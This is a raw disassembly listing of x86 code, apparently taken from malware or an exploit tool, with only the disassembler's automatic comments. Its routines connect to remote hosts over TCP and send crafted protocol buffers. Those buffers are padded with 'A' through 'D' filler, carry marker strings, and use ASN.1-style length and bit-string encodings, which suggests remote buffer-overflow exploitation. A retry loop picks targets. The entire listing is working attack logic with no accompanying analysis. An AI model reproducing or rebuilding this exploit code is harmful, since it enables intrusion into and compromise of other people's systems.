cmp eax, 0FFFFFFFFh
jz loc_4061A1
push 0
lea eax, [ebp+var_6AD8]
push 0FDCh
push eax
push [ebp+arg_4]
call esi ; dword_4011A8
jmp short loc_40619C
; ---------------------------------------------------------------------------
loc_40612A: ; CODE XREF: sub_405D60+30C�j
push 7Ch
lea eax, [ebp+var_20F4]
push offset dword_4027E4
push eax
call sub_409ABA ; memcpy
lea eax, [ebp+var_1110]
push 7D0h
push eax
lea eax, [ebp+var_2078]
push eax
call sub_409ABA ; memcpy
push 90h
lea eax, [ebp+var_18A8]
push offset off_402864
push eax
call sub_409ABA ; memcpy
add esp, 24h
and [ebp+var_13FD], 0
lea eax, [ebp+var_20F4]
push 0
push 0CF7h
push eax
push [ebp+arg_4]
call esi ; dword_4011A8
cmp eax, 0FFFFFFFFh
jz short loc_4061A1
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_4011A4
loc_40619C: ; CODE XREF: sub_405D60+3C8�j
cmp eax, 0FFFFFFFFh
jnz short loc_4061A5
loc_4061A1: ; CODE XREF: sub_405D60+50�j
; sub_405D60+27E�j ...
xor al, al
jmp short loc_4061A7
; ---------------------------------------------------------------------------
loc_4061A5: ; CODE XREF: sub_405D60+43F�j
mov al, 1
loc_4061A7: ; CODE XREF: sub_405D60+443�j
pop edi
pop esi
pop ebx
leave
retn
sub_405D60 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 650h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_409AB4 ; memset
mov esi, [ebp+8]
add esp, 0Ch
mov word ptr [ebp-10h], 2
mov eax, [esi+8]
mov [ebp-0Ch], eax
mov ax, [esi]
push eax
call dword_4011B0 ; ntohs
push edi
push edi
push edi
push 6
push 1
push 2
mov [ebp-0Eh], ax
call dword_4011BC ; WSASocketA
mov ebx, eax
lea eax, [ebp-10h]
push 10h
push eax
push ebx
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406210
call dword_401088 ; ExitThread
loc_406210: ; CODE XREF: code:00406208�j
push 89h
push offset dword_402458
push ebx
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40622D
call dword_401088 ; ExitThread
loc_40622D: ; CODE XREF: code:00406225�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40624C
call dword_401088 ; ExitThread
loc_40624C: ; CODE XREF: code:00406244�j
push 0A8h
push offset dword_4024E4
push ebx
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406269
call dword_401088 ; ExitThread
loc_406269: ; CODE XREF: code:00406261�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406288
call dword_401088 ; ExitThread
loc_406288: ; CODE XREF: code:00406280�j
push 0DEh
push offset dword_402590
push ebx
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4062A5
call dword_401088 ; ExitThread
loc_4062A5: ; CODE XREF: code:0040629D�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_4011A4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_4062C4
push edi
call dword_401088 ; ExitThread
loc_4062C4: ; CODE XREF: code:004062BB�j
movsx eax, byte ptr [ebp-60Ch]
sub eax, 30h
jz short loc_406344
push dword ptr [esi+8]
dec eax
jz short loc_406316
call sub_4073A9
pop ecx
push eax
call dword_401080 ; GetTickCount
push 3
xor edx, edx
pop ecx
div ecx
mov eax, [esi+4]
imul eax, 2Ch
push edx
push ebx
push dword_402F5C[eax]
call sub_405D60
add esp, 10h
test al, al
jz loc_40639A
push ebx
call sub_40867A
pop ecx
push edi
call dword_401088 ; ExitThread
loc_406316: ; CODE XREF: code:004062D4�j
call sub_4073A9
push eax
mov eax, [esi+4]
imul eax, 2Ch
push edi
push ebx
push dword_402F5C[eax]
call sub_405D60
add esp, 14h
test al, al
jz short loc_40639A
push ebx
call sub_40867A
pop ecx
push edi
call dword_401088 ; ExitThread
loc_406344: ; CODE XREF: code:004062CE�j
push dword ptr [esi+8]
call sub_4073A9
push eax
mov eax, [esi+4]
imul eax, 2Ch
push 2
push ebx
push dword_402F5C[eax]
call sub_405D60
add esp, 14h
test al, al
jnz short loc_40639A
push dword ptr [esi+8]
call sub_4073A9
push eax
mov eax, [esi+4]
imul eax, 2Ch
push 1
push ebx
push dword_402F5C[eax]
call sub_405D60
add esp, 14h
test al, al
jz short loc_40639A
push ebx
call sub_40867A
pop ecx
push edi
call dword_401088 ; ExitThread
loc_40639A: ; CODE XREF: code:00406302�j
; code:00406334�j ...
push ebx
call sub_40867A
pop ecx
push 1
call dword_401088 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_4063A9 proc near ; CODE XREF: sub_40661D+E�p
; sub_40661D+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_4063A9 endp
; =============== S U B R O U T I N E =======================================
sub_4063B3 proc near ; CODE XREF: sub_40661D+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_409A9C ; malloc
mov edi, eax
pop ecx
test edi, edi
jz short loc_4063E5
push ebx
push 0
push edi
call sub_409AB4 ; memset
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_409ABA ; memcpy
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_4063E5: ; CODE XREF: sub_4063B3+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4063B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063ED proc near ; CODE XREF: sub_4064E7+18�p
; sub_406561+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_409A9C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_406439
push edi
push 0
push esi
call sub_409AB4 ; memset
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_409ABA ; memcpy
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_409ABA ; memcpy
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_406439: ; CODE XREF: sub_4063ED+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_4063ED endp
; =============== S U B R O U T I N E =======================================
sub_406442 proc near ; CODE XREF: sub_4064E7+5E�p
; sub_4064E7+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_406452
push eax
call sub_409A20 ; free
pop ecx
loc_406452: ; CODE XREF: sub_406442+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_406442 endp
; =============== S U B R O U T I N E =======================================
sub_40645B proc near ; CODE XREF: sub_4064E7+20�p
; sub_4065C2+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_406488
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_409A9C ; malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40648C
loc_406488: ; CODE XREF: sub_40645B+D�j
xor al, al
jmp short loc_4064E3
; ---------------------------------------------------------------------------
loc_40648C: ; CODE XREF: sub_40645B+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_409AB4 ; memset
add esp, 0Ch
cmp ebx, 1
jnz short loc_4064B1
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_4064CB
; ---------------------------------------------------------------------------
loc_4064B1: ; CODE XREF: sub_40645B+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_4064CB: ; CODE XREF: sub_40645B+54�j
push eax
call sub_409ABA ; memcpy
add esp, 0Ch
push dword ptr [esi]
call sub_409A20 ; free
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_4064E3: ; CODE XREF: sub_40645B+2F�j
pop edi
pop esi
pop ebx
retn
sub_40645B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064E7 proc near ; CODE XREF: sub_40661D+89�p
; sub_40661D+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_409CFC
call sub_4063ED
lea ecx, [ebp+var_8]
call sub_40645B
mov eax, [ebp+var_4]
inc eax
push eax
call sub_409A9C ; malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_406521
xor al, al
jmp short loc_40655D
; ---------------------------------------------------------------------------
loc_406521: ; CODE XREF: sub_4064E7+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_409AB4 ; memset
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_409ABA ; memcpy
add esp, 18h
mov ecx, esi
call sub_406442
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_406442
mov al, 1
loc_40655D: ; CODE XREF: sub_4064E7+38�j
pop edi
pop esi
leave
retn
sub_4064E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406561 proc near ; CODE XREF: sub_406595+14�p
; sub_4065B2+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_4063ED
mov ecx, esi
call sub_406442
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_406561 endp
; =============== S U B R O U T I N E =======================================
sub_406595 proc near ; CODE XREF: sub_40661D+F0�p
; sub_40661D+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_409AA2 ; strlen
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_406561
pop esi
retn 4
sub_406595 endp
; =============== S U B R O U T I N E =======================================
sub_4065B2 proc near ; CODE XREF: sub_4065FE+B�p
; sub_40661D+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_406561
retn 8
sub_4065B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4065C2 proc near ; CODE XREF: sub_4065FE+16�p
; sub_40661D+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40645B
test al, al
jz short loc_4065FB
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_402D20
call sub_4063ED
mov ecx, esi
call sub_406442
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_4065FB: ; CODE XREF: sub_4065C2+F�j
pop esi
leave
retn
sub_4065C2 endp
; =============== S U B R O U T I N E =======================================
sub_4065FE proc near ; CODE XREF: sub_40661D+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4065B2
test al, al
jz short loc_406619
mov ecx, esi
call sub_4065C2
loc_406619: ; CODE XREF: sub_4065FE+12�j
pop esi
retn 8
sub_4065FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40661D proc near ; CODE XREF: code:00406BDF�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_4063A9
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_406971
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_406971
push esi
lea ecx, [ebp+var_30]
call sub_4063A9
lea ecx, [ebp+var_20]
call sub_4063A9
lea ecx, [ebp+var_50]
call sub_4063A9
lea ecx, [ebp+var_18]
call sub_4063A9
lea ecx, [ebp+var_40]
call sub_4063A9
lea ecx, [ebp+var_38]
call sub_4063A9
lea ecx, [ebp+var_28]
call sub_4063A9
push 4
push offset dword_402A78
lea ecx, [ebp+var_30]
call sub_406561
push 3
push offset dword_402A80
lea ecx, [ebp+var_30]
call sub_406561
lea ecx, [ebp+var_30]
call sub_4064E7
lea ecx, [ebp+var_30]
call sub_4065C2
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_409AB4 ; memset
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_406561
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_406561
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_406561
lea ecx, [ebp+var_20]
call sub_4064E7
push offset dword_402D48
lea ecx, [ebp+var_50]
call sub_406595
lea ecx, [ebp+var_50]
call sub_4064E7
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_409AB4 ; memset
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_4063B3
lea ecx, [ebp+var_58]
call sub_4064E7
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_4065FE
lea ecx, [ebp+var_58]
call sub_406442
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_409AB4 ; memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_406595
push 4
push offset dword_402A84
lea ecx, [ebp+var_18]
call sub_406561
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_406561
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_406561
lea ecx, [ebp+var_18]
call sub_4064E7
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_4065B2
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_4065B2
lea ecx, [ebp+var_40]
call sub_4065C2
lea ecx, [ebp+var_18]
call sub_406442
lea ecx, [ebp+var_50]
call sub_406442
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_4065B2
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_4065B2
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_4065B2
lea ecx, [ebp+var_38]
call sub_4065C2
lea ecx, [ebp+var_20]
call sub_406442
lea ecx, [ebp+var_30]
call sub_406442
lea ecx, [ebp+var_40]
call sub_406442
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_409AB4 ; memset
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_406561
lea ecx, [ebp+var_28]
call sub_4064E7
push 2
push offset dword_402D3C
lea ecx, [ebp+var_28]
call sub_406561
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_4065B2
lea ecx, [ebp+var_28]
call sub_4065C2
lea ecx, [ebp+var_38]
call sub_406442
lea ecx, [ebp+var_10]
call sub_4063A9
lea ecx, [ebp+var_8]
call sub_4063A9
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_4065B2
lea ecx, [ebp+var_10]
call sub_40645B
lea ecx, [ebp+var_28]
call sub_406442
push offset dword_402D38
lea ecx, [ebp+var_8]
call sub_406595
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_4065B2
lea ecx, [ebp+var_8]
call sub_40645B
lea ecx, [ebp+var_10]
call sub_406442
push offset dword_402D34
lea ecx, [ebp+var_10]
call sub_406595
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_4065B2
lea ecx, [ebp+var_10]
call sub_40645B
lea ecx, [ebp+var_8]
call sub_406442
push offset dword_402D28
lea ecx, [ebp+var_8]
call sub_406595
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_4065B2
lea ecx, [ebp+var_8]
call sub_40645B
lea ecx, [ebp+var_10]
call sub_406442
push offset dword_402D24
lea ecx, [ebp+var_48]
call sub_406595
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_4065B2
lea ecx, [ebp+var_8]
call sub_406442
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40697F
; ---------------------------------------------------------------------------
loc_406971: ; CODE XREF: sub_40661D+1B�j
; sub_40661D+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40697F: ; CODE XREF: sub_40661D+352�j
pop edi
pop ebx
leave
retn
sub_40661D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406983 proc near ; CODE XREF: sub_406A47+A1�p
; sub_406A47+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_4011C4 ; select
cmp eax, edi
jnz short loc_4069EA
lea eax, [ebp+var_10C]
push eax
push esi
call sub_409CDE ; __WSAFDIsSet
test eax, eax
jnz short loc_4069EE
loc_4069EA: ; CODE XREF: sub_406983+54�j
xor eax, eax
jmp short loc_4069FE
; ---------------------------------------------------------------------------
loc_4069EE: ; CODE XREF: sub_406983+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4011A4 ; recv
loc_4069FE: ; CODE XREF: sub_406983+69�j
pop edi
pop esi
leave
retn
sub_406983 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A02 proc near ; CODE XREF: sub_406A47+81�p
; sub_406A47+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push [ebp+arg_8]
call dword_4011C8 ; ntohl
mov esi, dword_4011A8
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call esi ; dword_4011A8
cmp eax, 4
jz short loc_406A2F
xor al, al
jmp short loc_406A44
; ---------------------------------------------------------------------------
loc_406A2F: ; CODE XREF: sub_406A02+27�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; dword_4011A8
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
loc_406A44: ; CODE XREF: sub_406A02+2B�j
pop esi
leave
retn
sub_406A02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A47 proc near ; CODE XREF: sub_406B21+48�p
; code:00406C58�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_409A9C ; malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_406A70
xor al, al
jmp loc_406B1C
; ---------------------------------------------------------------------------
loc_406A70: ; CODE XREF: sub_406A47+20�j
push ebx
push 0
push esi
call sub_409AB4 ; memset
push 2Fh
push offset dword_402B14
push esi
call sub_409ABA ; memcpy
push 8
lea eax, [esi+31h]
push offset dword_402B44
push eax
mov [esi+2Fh], di
call sub_409ABA ; memcpy
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_409ABA ; memcpy
push 6
add ebx, edi
push offset dword_409CF4
push ebx
call sub_409ABA ; memcpy
mov ebx, [ebp+arg_0]
push 85h
push offset dword_402A8C
push ebx
call sub_406A02
add esp, 48h
test al, al
jnz short loc_406AD8
loc_406AD4: ; CODE XREF: sub_406A47+B5�j
xor bl, bl
jmp short loc_406B13
; ---------------------------------------------------------------------------
loc_406AD8: ; CODE XREF: sub_406A47+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_406983
push [ebp+var_4]
push esi
push ebx
call sub_406A02
add esp, 1Ch
test al, al
jz short loc_406AD4
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_406983
add esp, 10h
mov bl, 1
loc_406B13: ; CODE XREF: sub_406A47+8F�j
push esi
call sub_409A20 ; free
pop ecx
mov al, bl
loc_406B1C: ; CODE XREF: sub_406A47+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_406A47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B21 proc near ; CODE XREF: code:loc_406C5F�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_402B50
push [ebp+arg_0]
call dword_4011A8 ; send
cmp eax, 48h
jnz short loc_406B5C
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_406983
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406B5C
cmp [ebp+var_20], 82h
jz short loc_406B60
loc_406B5C: ; CODE XREF: sub_406B21+1B�j
; sub_406B21+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_406B60: ; CODE XREF: sub_406B21+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_406A47
add esp, 0Ch
leave
retn
sub_406B21 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 220h
push ebx
push esi
mov esi, [ebp+8]
push edi
push 7
push offset a__ ; "\r\n\\_/."
mov eax, [esi+4]
xor ebx, ebx
imul eax, 2Ch
mov [ebp-8], ebx
mov [ebp-1], bl
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-220h]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
add esp, 1Ch
cmp eax, ebx
jnz short loc_406BC9
push ebx
call dword_401088 ; ExitThread
loc_406BC9: ; CODE XREF: code:00406BC0�j
push eax
lea eax, [ebp-220h]
push eax
push 164h
lea eax, [ebp-10h]
push offset aSvwfbA ; "SVWf"
push eax
call sub_40661D
add esp, 14h
cmp [ebp-0Ch], ebx
jnz short loc_406BF3
push ebx
call dword_401088 ; ExitThread
loc_406BF3: ; CODE XREF: code:00406BEA�j
; code:00406C88�j
cmp [ebp-1], bl
jnz loc_406C8E
push 10h
lea eax, [ebp-20h]
push ebx
push eax
call sub_409AB4 ; memset
mov eax, [esi+8]
add esp, 0Ch
mov [ebp-1Ch], eax
mov ax, [esi]
push eax
mov word ptr [ebp-20h], 2
call dword_4011B0 ; ntohs
push ebx
push ebx
push ebx
push 6
push 1
push 2
mov [ebp-1Eh], ax
call dword_4011BC ; WSASocketA
mov edi, eax
cmp edi, ebx
jz short loc_406C9D
lea eax, [ebp-20h]
push 10h
push eax
push edi
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_406CA4
push dword ptr [ebp-0Ch]
cmp [ebp-8], ebx
push dword ptr [ebp-10h]
push edi
jnz short loc_406C5F
call sub_406A47
jmp short loc_406C64
; ---------------------------------------------------------------------------
loc_406C5F: ; CODE XREF: code:00406C56�j
call sub_406B21
loc_406C64: ; CODE XREF: code:00406C5D�j
add esp, 0Ch
mov [ebp-1], al
push edi
call dword_4011B8 ; closesocket
cmp [ebp-1], bl
jnz short loc_406C81
push 3E8h
call dword_40107C ; Sleep
loc_406C81: ; CODE XREF: code:00406C74�j
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 2
jl loc_406BF3
loc_406C8E: ; CODE XREF: code:00406BF6�j
lea ecx, [ebp-10h]
call sub_406442
push ebx
call dword_401088 ; ExitThread
loc_406C9D: ; CODE XREF: code:00406C38�j
push ebx
call dword_401088 ; ExitThread
loc_406CA4: ; CODE XREF: code:00406C4A�j
push ebx
call dword_401088 ; ExitThread
push ebp
mov ebp, esp
sub esp, 0A14h
push esi
mov esi, [ebp+8]
push edi
push 2
mov eax, [esi+4]
push offset asc_402E1C ; "\r"
imul eax, 2Ch
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-0A14h]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
xor edi, edi
add esp, 1Ch
cmp eax, edi
mov [ebp-4], eax
jnz short loc_406CFD
push edi
call dword_401088 ; ExitThread
loc_406CFD: ; CODE XREF: code:00406CF4�j
push 10h
lea eax, [ebp-14h]
push edi
push eax
call sub_409AB4 ; memset
mov ax, [esi]
add esp, 0Ch
mov word ptr [ebp-14h], 2
push eax
call dword_4011B0 ; ntohs
push edi
push edi
push edi
mov [ebp-12h], ax
mov eax, [esi+8]
push 6
push 1
push 2
mov [ebp-10h], eax
call dword_4011BC ; WSASocketA
lea ecx, [ebp-14h]
push 10h
push ecx
push eax
mov [ebp+8], eax
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_406D51
push edi
call dword_401088 ; ExitThread
loc_406D51: ; CODE XREF: code:00406D48�j
push ebx
mov ebx, 90h
push 800h
lea eax, [ebp-814h]
push ebx
push eax
call sub_409AB4 ; memset
push 24h
lea eax, [ebp-814h]
push offset dword_402D54
push eax
call sub_409ABA ; memcpy
push 210h
lea eax, [ebp-7F0h]
push 4Dh
push eax
call sub_409AB4 ; memset
push 4
lea eax, [ebp-5E0h]
pop edi
push edi
push offset aEu4 ; "\x1B4"
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5DCh]
push offset aCccc ; "CCCC"
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5D8h]
push offset dword_402D7C
push eax
call sub_409ABA ; memcpy
add esp, 48h
mov esi, offset dword_402D80
lea eax, [ebp-5D4h]
push edi
push esi
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5D0h]
push esi
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5CCh]
push offset a3333 ; "3333"
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5C8h]
push esi
push eax
call sub_409ABA ; memcpy
push edi
lea eax, [ebp-5C4h]
push esi
push eax
call sub_409ABA ; memcpy
push 58h
lea eax, [ebp-5C0h]
push 41h
push eax
call sub_409AB4 ; memset
mov edi, [ebp-4]
mov eax, 200h
add esp, 48h
sub eax, edi
push eax
lea eax, [ebp-568h]
push ebx
push eax
call sub_409AB4 ; memset
mov esi, 4ACh
lea eax, [ebp-0A14h]
sub esi, edi
push edi
push eax
lea eax, [ebp+esi-814h]
push eax
call sub_409ABA ; memcpy
add esi, edi
push 5
push offset dword_402E04
lea eax, [ebp+esi-814h]
push eax
call sub_409ABA ; memcpy
add esp, 24h
add esi, 5
lea eax, [ebp-814h]
push 0
push esi
push eax
push dword ptr [ebp+8]
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
pop ebx
jnz short loc_406E9E
push 0
call dword_401088 ; ExitThread
loc_406E9E: ; CODE XREF: code:00406E94�j
push dword ptr [ebp+8]
call sub_40867A
pop ecx
push 1
